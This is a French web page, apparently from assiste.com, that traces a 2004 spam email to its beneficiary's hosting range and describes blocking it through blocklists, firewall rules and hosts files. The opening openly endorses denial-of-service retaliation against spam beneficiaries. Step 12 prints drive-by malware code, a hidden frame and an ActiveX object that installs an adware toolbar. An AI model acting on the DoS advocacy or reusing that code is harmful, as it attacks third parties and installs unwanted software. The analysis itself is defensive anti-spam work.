L'idée est simple : l'arroseur arrosé !

Dans l'affaire des spam, il y a le spammeur, celui qui exécute, techniquement, l'envoi du spam, souvent grâce à des BotNets (vos ordinateurs squattés par des maffieux qui s'en servent à votre insu). Mais le spammeur n'est que l'exécutant des basses oeuvres. Il faut s'attaquer à celui à qui le crime profite !

Qui est-ce ? C'est simple : dans un spam, qui est une action "commerciale", le but est de vous diriger vers un site de e-commerce. Il faut donc bien, à un moment donné, que ce site se révèle, qu'il soit indiqué. Identifions-le et attaquons le en Déni de Service. C'est la loi du Talion (Réciprocité du crime et de la peine - Œil pour œil, dent pour dent).

• Ce n'est pas forcément élégant mais qu'est-ce que l'élégance vient faire là-dedans !
  
  
• Ce n'est pas forcément légal mais il serait difficile à une société de juger illégal un acte de défense contre un agresseur d'autant que cette même société brille par son indifférence totale ou son mépris de l'Internaute de base et défend, ne serais-ce que par passivité, les intérêts de l'écosystème des milieux maffieux !
  

L'affaire Blue Security (son service Blue Frog) se solde par un échec lamentable d'une tentative pourtant merveilleuse d'attaque, par les internautes, de celui à qui le crime profite.

L'attaque "Make love, not Spam", contre les spammeurs, s'est également soldée par un échec et a été arrêtée le 21 décembre 2004. Son principe était simple et génial.




Faire bloquer les machines et les domaines du bénéficiaire
En attendant que de nouveaux outils et projets d'attaques des spammeurs soient disponibles, on peut aussi faire bloquer les domaines et les machines des bénéficiaires. Nous allons ici identifier un bénéficiaire et utiliser Spam-rbl (une liste de blocage en temps réel utilisée par de nombreux outils anti-spam) pour déconcer cette URL.

Nota : on dénoncera le bénéficiaire également sur URIbl.com. Il s'agit d'une liste de blocage en temps réel uniquement consacrée aux blocages des bénéficiaires des spam. Cette liste est née en 2005 sur une idée que nous décrivions dans ces pages dès 2002 - idée bien plus efficace que le blocage des spammeurs - opération quasi impossible puisqu'ils exploitent à l'insu de leurs propriétaires des centaines de millions d'ordinateurs de "Monsieur tout-le-monde". Notre idée est simple : appuyer là où ça fait mal : couper activement l'argent !

• Résistance passive :
  Si, dans le spam, il est fait référence à un produit ou un service, la première chose à faire et d'opposer une résistance passive en n'utilisant jamais, en n'achetant jamais le produit ou service dont la promotion s'est faite par Spam.
  
  
• Résistance active :
  Si, dans le spam, il est fait référence à un site Internet, introduire immédiatement ce nom de domaine dans les listes hosts de blocage et son adresse IP dans les filtres IPs de blocage. Ceci n'aura pas pour effet de bloquer le spam mais de bloquer le site du bénéficiaire du spam, le donneur d'ordre, celui qui a payé le spammeur.
  
  
  • Les listes hosts de blocage étant de plus en plus diffusées dans tous les mondes (mac, windows, linux etc. ...) ceci conduira les annonceurs à renoncer au spam comme moyen de promotion afin de ne pas risquer le verrouillage de leurs sites. Toutefois il faut relativiser le blocage de ce genre de site. En effet, si les grands sites, de grande notoriété, qui s'inscrivent dans la durée, ne pratiquent pas le spam, les sites bénéficiaires d'un spam massif n'existent que quelques jours à une semaine et disparaissent aussitôt. Il y a bien assez de combinaisons possibles avec les 26 lettre de notre alphabet pour avoir un réservoir illimité de noms de domaines qui poussent et meurent comme des champignons.
    
    
  • Les filtres IPs de blocage sont plus confidentiels, voire inexistants et, lorsqu'ils existent, ils sont complexes à mettre en oeuvre. Les solutions consistent à utiliser, dans le monde Windows, les couches de bas niveau de votre pare-feu (firewall) ou, dans le monde Unix, les iptables. Faire une recherche de l'adresse IP de la machine hébergeant le domaine et introduire une règle, dans votre pare-feu (firewall) ou iptables, bloquant toute communication dans tous les protocoles, pour cette adresse IP ou pour tout l'intervalle d'adresses IPs de l'annonceur. Ceci non plus n'aura pas pour effet de bloquer le spam mais bloquera carrément les machines du bénéficiaire du spam. Même s'il change chaque matin les noms de ses sites (qui n'ont de durée de vie que la durée de vie d'un coup publicitaire soit, au maximum, 1 semaine), il hébergera toujours ses sites sur ses machines avec leurs adresses IP stables. Le blocage par filtration d'IPs est donc beaucoup plus efficace et durable que le blocage par noms de domaine avec hosts.
    
    

Procédure de résistance active :
Le plus simple : ouvrez un compte chez Spam-rbl (rbl pour Realtime Blackhole List - Liste de trous noirs en temps réel) et déposez-y les codes sources des spams reçus. Des robots vont immédiatement vous donner plusieurs informations, en particulier en analysant automatiquement les entêtes des spams. Confirmez alors vos plaintes. Si le nombre de plaintes est élevé (pour éviter les simples "dénonciations calomnieuses" etc. ...), Spam-rbl déclenche une mise en liste noire (blackliste) des machines et sites des spammeurs. Cette information est automatiquement diffusée auprès des grands acteurs de messagerie sur Internet et certains utilitaires anti-spam, comme SpamPal, utilisent ces blacklistes. C'est déjà bien mais ce n'est pas ce que nous recherchons car nous voulons punir le bénéficiaire du spam, pas son intermédiaire, le spammeur.

Procédure de résistance active pour internautes rebelles aux spams.
Pour des raisons pédagogiques, nous avons choisi un cas très simple de spam et allons suivre "à la main" une partie de ce que Spam-rbl fait automatiquement puis nous allons poursuivre. Tout le monde devrait arriver à comprendre la démarche effectuée même s'il n'est pas question de la reproduire, techniquement parlant.

1. Soit un email qui "sent" le spam dans votre boîte de réception.
   
   
   
   
2. Le volet de visualisation étant fermé pour se protéger des email piégés, on clique sur l'email (juste une fois, pour le sélectionner - on ne clique pas 2 fois, ce qui l'ouvrirait) et on l'ouvre en mode source (dans Thunderbird : Affichage > Code source du message), ce qui nous donne le texte suivant (des tonnes d'interlignes rejettent au loin (rendent invisible) les mentions obligatoires de "désabonnements" (sic) de leur liste - ne jamais utiliser ces pseudos liens de désabonnement qui ne servent aux spammeurs qu'à vérifier que votre adresse e-mail est valide - or une adresse e-mail "validée" vaut plus cher et le spammeur gagne encore plus d'argent).
   
   

   From - Sun Jan 11 12:56:40 2004 X-UIDL: 1050612355.269 X-Mozilla-Status: 0001 X-Mozilla-Status2: 00000000 Return-Path: <b.incomeinc.0-2bac129-8f2.wanadoo.fr.-wwwwwwwww@boys.singlescolorado.com> Received: from mwinf0503.wanadoo.fr (mwinf0503.wanadoo.fr) by mwinb0104 (SMTP Server) with LMTP; Sun, 11 Jan 2004 12:52:10 +0100 X-Sieve: Server Sieve 2.2 Received: from boys.singlescolorado.com (boys.singlescolorado.com [216.201.86.35]) by mwinf0503.wanadoo.fr (SMTP Server) with ESMTP id D50A51800081 for <wwwwwwwww@wanadoo.fr>; Sun, 11 Jan 2004 12:52:09 +0100 (CET) Received: (from daemon@localhost) by boys.singlescolorado.com (8.8.8/8.8.8) id FAA24656; Sun, 11 Jan 2004 05:50:11 -0500 (EST) Date: Sun, 11 Jan 2004 06:49:30 -0500 (EST) Message-Id: <200401111050.FAA24656@boys.singlescolorado.com> From: Julie <incomeinc@boys.singlescolorado.com> To: wwwwwwwww@wanadoo.fr Subject: still single? wwwwwwwww@wanadoo.fr MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Cupids Cams. Hot Dating Site With 1,600,000 Singles. Click Below For Your Free Membership. http://boys.singlescolorado.com/m/l?2u3-7op2-1-46tq-12qdm wwwwwwwww@wanadoo.fr To unsubscribe, go to: http://boys.singlescolorado.com/remove?r.incomeinc.0-2bac129-8f2.wanadoo.fr.-wwwwwwwww?r or, send a blank message to: mailto:r.incomeinc.0-2bac129-8f2.wanadoo.fr.-wwwwwwwww@boys.singlescolorado.com

   
   
   
3. Cliquez n'importe où dans la fenêtre du code source puis faites un clic "droit" et "select all" ou "sélectionner tout" et, à nouveau, un clic "droit" et "copy" ou "copier". C'est cette copie que vous devez passer à spam-rbl.
   
   
4. A la lecture du texte de l'e-mail (les 3 dernières lignes du 1er paragraphe, tout ce qui est au-dessus constituant l'entête - le "header"), confirmation que ce courrier n'est pas sollicité.
   
   

   "Cupids Cams. Hot Dating Site With 1,600,000 Singles. Click Below For Your Free Membership. http://boys.singlescolorado.com/m/l?2u3-7op2-1-46tq-12qdm"

   
   Par contre on remarque qu'il est envoyé au profit d'un site, "boys.singlescolorado.com". On remarque aussi que le mail n'est pas piégé (il n'y a pas de code html, pas de script, pas de type MIME etc. ...). Voyons à qui le crime profite.
   
   
5. On fait un NSlookup (Outils DNS) sur ce nom de ce domaine soit "boys.singlescolorado.com". On obtient l'adresse IP de la machine qui l'héberge, soit 216.201.86.35 ce qui est également indiqué dans une des lignes "Received" du spam. Donc c'est l'annonceur qui fait lui-même son spam ou le spammeur qui passe une annonce - dans ce cas les 2 se confondent, c'est blanc bonnet et bonnet blanc (d'âne).
   
   
6. Dans la première étape du dépôt de plainte auprès de spam-rbl, l'analyse de la succession des champs "received" de l'entête donne :
   
   

   "216.201.86.35 (boys.singlescolorado.com) est le spammeur (IN) : Cette IP n'est pas blacklistée (1 spam(s) direct(s)). 216.201.86.35 --> boys.singlescolorado.com --> 216.201.86.35 boys.singlescolorado.com est validé Abuse.net donne :postmaster@singlescolorado.com"

   
   On fait alors un Whois sur l'adresse 216.201.86.35. On obtient ceci (nom de l'opérateur : Octapus VPN, adresse réelle (?) et, surtout, l'intervalle d'adresses IPs dans lequel la machine incriminée se trouve soit 216.201.80.0 à 216.201.95.255. C'est là où les choses se compliquent et où l'internaute hargneux mais primaire décide de bloquer aveuglément tout l'intervalle soit, dans ce cas, 4096 machines qui peuvent être 4096 serveurs ! C'est la raison qui me fait me méfier des intervalles donnés sauvagement dans des outils comme PeerGuardian.
   
   
7. Il faut vérifier, autant que faire se peut, ce qu'il y a sur ces machines. Faisons le avec des moyens mis à la disposition de tout le monde. Nous allons utiliser, tout d'abord, un tableur pour fabriquer du code html de la manière suivante.
   
   • Dans la colonne A, créer l'ensemble des adresses IPs de 216.201.80.0 à 216.201.95.255 (216.201.80.0 à 216.201.80.255 puis 216.201.81.0 à 216.201.81.255 puis 216.201.82.0 à 216.201.82.255 etc. ...)
     
     
   • Dans la colonne d'à côté, B, écrire la formule suivante en ligne 1: ="<a href=""http://"&A1&""">"&A1&"</a><br>"
     
     
   Le code généré, pour la première ligne, doit être: <a href="http://216.201.80.0">216.201.80.0</a><br> c'est-à-dire un lien, en html, vers une machine, avec le protocole http. Recopiez cette formule (4095 fois à côté des 4095 autres IPs pour cet exemple).
   
   
8. Créer une page html vide (un fichier nommé, par exemple, test.html) et faites un copie/coller du code suivant qui est la structure minimale pour une page html):
   
   

   <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"> <title>Validation d'IPs - http://assiste.com</title> </head> <body bgcolor="#ffffff"> <p></p> </body> </html>

   
   
9. Introduisez la totalité du code généré par le tableur entre les balises <body> et </body>. Vous devez obtenir quelque chose comme :
   
   

   <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"> <title>Validation d'IPs - http://assiste.com</title> </head> <body bgcolor="#ffffff"> <p> <a href="http://216.201.80.0">216.201.80.0</a><br> <a href="http://216.201.80.1">216.201.80.1</a><br> <a href="http://216.201.80.2">216.201.80.2</a><br> <a href="http://216.201.80.3">216.201.80.3</a><br> <a href="http://216.201.80.4">216.201.80.4</a><br> .../... <a href="http://216.201.95.250">216.201.95.250</a><br> <a href="http://216.201.95.251">216.201.95.251</a><br> <a href="http://216.201.95.252">216.201.95.252</a><br> <a href="http://216.201.95.253">216.201.95.253</a><br> <a href="http://216.201.95.254">216.201.95.254</a><br> <a href="http://216.201.95.255">216.201.95.255</a><br> </p> </body> </html>

   
   
10. Sauvegardez cette page. Procurez-vous (gratuit) et dézippez Xenu's Link Sleuth (directement opérationnel sans phase d'installation - un site à voir aussi pour sa dénonciation de la scientologie).
    
    
11. Ouvrez, avec Xenu, la page que vous venez de créer sur votre disque dur et attendre la fin du test. Dans le cas présent la quasi totalité des machines n'existent pas ou ne répondent pas. Quelques-unes sont interdites d'accès, l"une est protégée par un mot de passe, une autre contient un micro site de 5 pages présentant Octapus VPN, le propriétaire de l'intervalle, comme un hébergeur, et 3 sont redirigées vers un autre site.
    
    
    
    
    
12. Nous poursuivons maintenant avec de nombreuses actions manuelles. Accès aux sites trouvés ou aux machines qui répondent - ce sont, encore une fois, des redirections vers des sites pornographiques. On regarde alors le code source de ces sites. Le site s'affiche dans un frameset contenant un frame caché dont le contenu provient d'un autre site, piégé, installant une variante de l'adware et hijacker NN-BAR (getmirar). Par ailleurs, toutes les vidéos de "démonstration" proposées aux gogos sur le site sont des programmes exécutables (des .exe) - on suppose donc qu'il s'agit d'autant de malveillances dans le genre spyware ou backdoor ou dialer !.
    
    Voici le code du frameset contenant le frame caché avec appel au site piégé :
    
    

    <html> <head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> </head> <frameset rows="100%,0%" frameborder="NO" border="0" framespacing="0"> <frame src="http://www.e-xtremepenetration.com/bnr/3050852020&bb=0"> <frame src="http://download.getmirar.com/875463" scrolling="NO" noresize> </frameset> <noframes><body> </body></noframes> </html>

    
    Voici le code source du site piégé :
    
    

    <html> <head> <object WIDTH="1" HEIGHT="1" CLASSID="CLSID:8A0DCBDA-6E20-489C-9041-C1E8A0352E75" CODEBASE="/875463/files/installer.cab"> </object> </head> <body> </body> </html>

    
    
    
13. Quelques recherches rapides avec Google sur le Net montre que Octapus VPN est déjà considéré comme un spammeur et que le clsid 8A0DCBDA-6E20-489C-9041-C1E8A0352E75 est bien celui d'une malveillance (il s'agit de Mirar Toolbar.A).
    
    
14. A partir de maintenant, on peut décider de blacklister l'intervalle 216.201.80.0 à 216.201.95.255 d'Octapus VPN ainsi que ses domaines
    
    www.jasaras.com
    mt98.mtree.com
    freelivesex.cf.mtreexxx.net
    www.mtreexxx.nl
    
    Pour ce faire, ajouter une règle dans votre firewall, bloquant tout trafic de et vers toutes les machines de l'intervalle 216.201.80.0 à 216.201.95.255, sur tous les protocoles et ajouter les noms de domaines dans votre liste hosts.
    
    
15. Publication de ces résultats
    Le problème devient épineux si on décide de publier le résultat de cette étude dans des listes de blocage mise à disposition des internautes et proposée au téléchargement (type Hosts). Il faut pouvoir y travailler à temps plein et donner la possibilité aux spammeurs et à leurs clients de se justifier et de sortir des listes de blocages. Il faut maintenir des justifications étayées des blocages proposés, comme cette présente page par exemple, ce qui représente 1/2 journée à 1 journée de travail par blocage. Il faut s'attendre aux foudres des bloqués dont des attaques en justice et/ou en Déni de Service donc il faut réellement et explicitement justifier ses propositions et se couvrir par un arsenal de déclarations dans lesquelles
    
    • vous ne proposez qu'une analyse personnelle
      
    • C'est à chaque internaute de décider.
      
    C'est un travail de Titan et un suivi de chaque instant, en équipe, en temps réel, sur des années (les listes de blocage - DNSBL - sont mises à jour en temps réel et les utilitaires s'y référençant sont mis à jour toute les 1/2 heure en moyenne). Donc:
    
    1. Soit on garde ces résultats pour soi en les mettant en oeuvre sur son seul ordinateur
       
       
    2. Soit on donne les sources des e-mails à ceux qui savent, en temps réel, quoi en faire, comme spam-rbl, et qui, se trouvant à des points de confluence de très nombreuses remontées d'informations, ont les moyens techniques et humains d'assurer en temps réel et dans la durée la maintenance de telles listes. Les utilitaires comme SpamPal utilisent ces listes publiques. Voire une liste de DNSBL dans le sous-main.
       
       
    3. Soit on est hargneux et on a du temps et des moyens et on se lance dans la construction d'une liste de blocage de bénéficiaires des spam (et non pas une liste de spammeurs). Après la démarche décrite sur cette page, introduire l'intervalle d'adresses IPs dans une liste pivot au format PeerGuardian et utiliser le convertisseur donné sur la même page pour générer des listes dans divers formats (ZoneAlarm Pro, iptables etc. ...)
       

Nouvelle adresse du site Assiste.com depuis le 22 octobre 2012 : http://assiste.com